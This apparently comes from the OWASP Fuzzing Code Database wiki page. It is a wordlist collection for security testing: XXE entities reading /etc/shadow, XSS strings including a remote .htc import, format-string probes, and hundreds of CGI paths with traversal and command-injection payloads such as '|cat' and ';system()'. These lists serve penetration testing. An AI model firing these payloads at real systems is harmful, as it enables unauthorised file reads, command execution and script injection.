"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Foobar@email.de<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| project_description = <br />
| leader_name = Wagner Elias<br />
| leader_email = <br />
| leader_username = Wagner.elias<br />
| maintainer_name = <br />
| maintainer_email = <br />
| maintainer_username = <br />
| contributor_name1 = <br />
| contributor_email1 = <br />
| contributor_username1 = <br />
| contributor_name2 = <br />
| contributor_email2 = <br />
| contributor_username2 = <br />
| contributor_name3 = <br />
| contributor_email3 = <br />
| contributor_username3 = <br />
| contributor_name4 = <br />
| contributor_email4 = <br />
| contributor_username4 = <br />
| contributor_name5 = <br />
| contributor_email5 = <br />
| contributor_username5 = <br />
| contributor_name6 = <br />
| contributor_email6 = <br />
| contributor_username6 = <br />
| contributor_name7 = <br />
| contributor_email7 = <br />
| contributor_username7 = <br />
| contributor_name8 = <br />
| contributor_email8 = <br />
| contributor_username8 = <br />
| contributor_name9 = <br />
| contributor_email9 = <br />
| contributor_username9 = <br />
| contributor_name10 = <br />
| contributor_email10 = <br />
| contributor_username10 = <br />
| pamphlet_link = <br />
| mailing_list_name = owasp-fuzzing-code-database<br />
| links_url1 = <br />
| links_name1 = <br />
| links_url2 = <br />
| links_name2 = <br />
| links_url3 = <br />
| links_name3 = <br />
| links_url4 = <br />
| links_name4 = <br />
| links_url5 = <br />
| links_name5 = <br />
| links_url6 = <br />
| links_name6 = <br />
| links_url7 = <br />
| links_name7 = <br />
| links_url8 = <br />
| links_name8 = <br />
| links_url9 = <br />
| links_name9 = <br />
| links_url10 = <br />
| links_name10 = <br />
| project_road_map =<br />
| project_health_status = <br />
| current_release_name = <br />
| current_release_date = <br />
| current_release_download_link = <br />
| current_release_rating = <br />
| current_release_leader_name = <br />
| current_release_leader_email = <br />
| current_release_leader_username = <br />
| last_reviewed_release_name = <br />
| last_reviewed_release_date = <br />
| last_reviewed_release_download_link = <br />
| last_reviewed_release_rating = <br />
| last_reviewed_release_leader_name = <br />
| last_reviewed_release_leader_email = <br />
| last_reviewed_release_leader_username = <br />
| old_release_name1 = <br />
| old_release_date1 = <br />
| old_release_download_link1 = <br />
| old_release_name2 = <br />
| old_release_date2 = <br />
| old_release_download_link2 = <br />
| old_release_name3 = <br />
| old_release_date3 = <br />
| old_release_download_link3 = <br />
| old_release_name4 = <br />
| old_release_date4 = <br />
| old_release_download_link4 = <br />
| old_release_name5 = <br />
| old_release_date5 = <br />
| old_release_download_link5 = <br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80302
Category:OWASP Fuzzing Code Database
2010-03-22T17:05:41Z
<p>Foobar23: /* XSS Statements - Most effective/most common statements */ Marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Delete 33 XSS Statement Duplicate <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included on this project: <br />
<br />
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases <br />
<br />
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. <br />
<br />
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users on the report of their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
